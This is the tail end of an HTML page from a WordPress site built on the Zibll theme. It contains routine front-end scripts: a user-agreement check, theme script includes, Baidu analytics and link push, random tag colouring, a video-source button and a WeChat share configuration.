                        _user_agreement_auths_box.removeClass('ani shake');
                    }, 400);

                    notyf('请先阅读并同意协议', 'danger');
                    // 禁用按钮1秒后恢复
                    $('.but.c-blue').prop('disabled', true);
                    setTimeout(function() {
                        $('.but.c-blue').prop('disabled', false);
                    }, 1000);
                } else {
                    // 启用按钮(可选,根据需要)
                    $('.but.c-blue').prop('disabled', false);
                }
            }

            $('body').on('click', '.but-average.modal-buts .but.c-blue', function () {
                handleAgreementSubmission();
            });
        });
    </script>
    <script id="bootstrap-js" src="https://bdziyi.com/wp-content/themes/zibll/js/libs/bootstrap.min.js?ver=9.0"></script>
<script id="loader_js-js" src="https://bdziyi.com/wp-content/themes/zibll/js/loader.js?ver=9.0"></script>
<script id="forums-js" src="https://bdziyi.com/wp-content/themes/zibll/inc/functions/bbs/assets/js/main.min.js?ver=9.0"></script>
<script id="shop-js" src="https://bdziyi.com/wp-content/themes/zibll/inc/functions/shop/assets/js/main.min.js?ver=9.0"></script>
<script type="text/javascript">var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?b1d5fe7471881173b0b5a05d2c916139";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();

var links = document.querySelectorAll('.item-tags a');

for (var i = 0; i < links.length; i++) {
  var randomColor;
  do {
    var r = Math.floor(Math.random() * 128) + 128;
    var g = Math.floor(Math.random() * 128) + 128;
    var b = Math.floor(Math.random() * 128) + 128;
    randomColor = 'rgb(' + r + ',' + g + ',' + b + ')';
  } while ((r * 0.299 + g * 0.587 + b * 0.114) > 200); // 确保亮度不超过200

  links[i].style.backgroundColor = randomColor;
}

//视频
$(document).ready(function() {
    $('#xiayg').on('click', function() {
        var $videoElement = $('.dplayer-video-wrap .dplayer-video.dplayer-video-current');

        if ($videoElement.length) {
            $videoElement.attr('src', 'https://api.86512.cn/api/web.php');
            $videoElement[0].load();
            $videoElement[0].play();
        } else {
            console.error('找不到视频元素');
        }
    });
});
</script>    <!--baidu_push_js-->
    <script type="text/javascript">
        (function() {
            var bp = document.createElement('script');
            var curProtocol = window.location.protocol.split(':')[0];
            if (curProtocol === 'https') {
                bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
            } else {
                bp.src = 'http://push.zhanzhang.baidu.com/push.js';
            }
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(bp, s);
        })();
    </script>
    <!--baidu_push_js-->
    <script type="text/javascript">
        console.log("数据库查询:29次 | 页面生成耗时:1131.41ms");
    </script>
<script type="text/javascript">
    window.WeChatShareDate = {
        appId: 'wx8c358971b57c3409',
        timestamp: '1787657447',
        nonceStr: 'LTp3eOYkJy6A20yo',
        signature: '84af2fc30a5b63590fd84444f4fcf91900386289',
        url: 'https://bdziyi.com/2237/',
        title: '',
        img: '\/images\/logo_solarwinds_login\.png',
        desc: '',
    }
</script>
        <script type="text/javascript">_win.signin_wx_priority = true;</script>
</body>
</html>
<!-- Performance optimized by Redis Object Cache. Learn more: https://wprediscache.com -->